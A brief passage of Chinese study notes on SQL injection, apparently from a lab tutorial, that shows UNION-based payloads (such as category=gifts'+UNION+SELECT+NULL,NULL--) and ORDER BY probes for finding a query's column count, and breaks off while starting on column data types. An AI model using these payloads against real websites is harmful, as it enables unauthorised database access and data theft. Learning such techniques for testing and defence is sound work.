第三篇：sql注入SQL 注入 UNION 攻击，确定查询返回的列数：1234/?category=gifts'+UNION+SELECT+NULL,NULL-- 有则正确返回包，无则报错或/？category=gifts'+order+by+1,2# 无则正确返回包，有则报错哈希字符可用于标识注释。--# 查找数据列的字段类型：1234/?category=gif...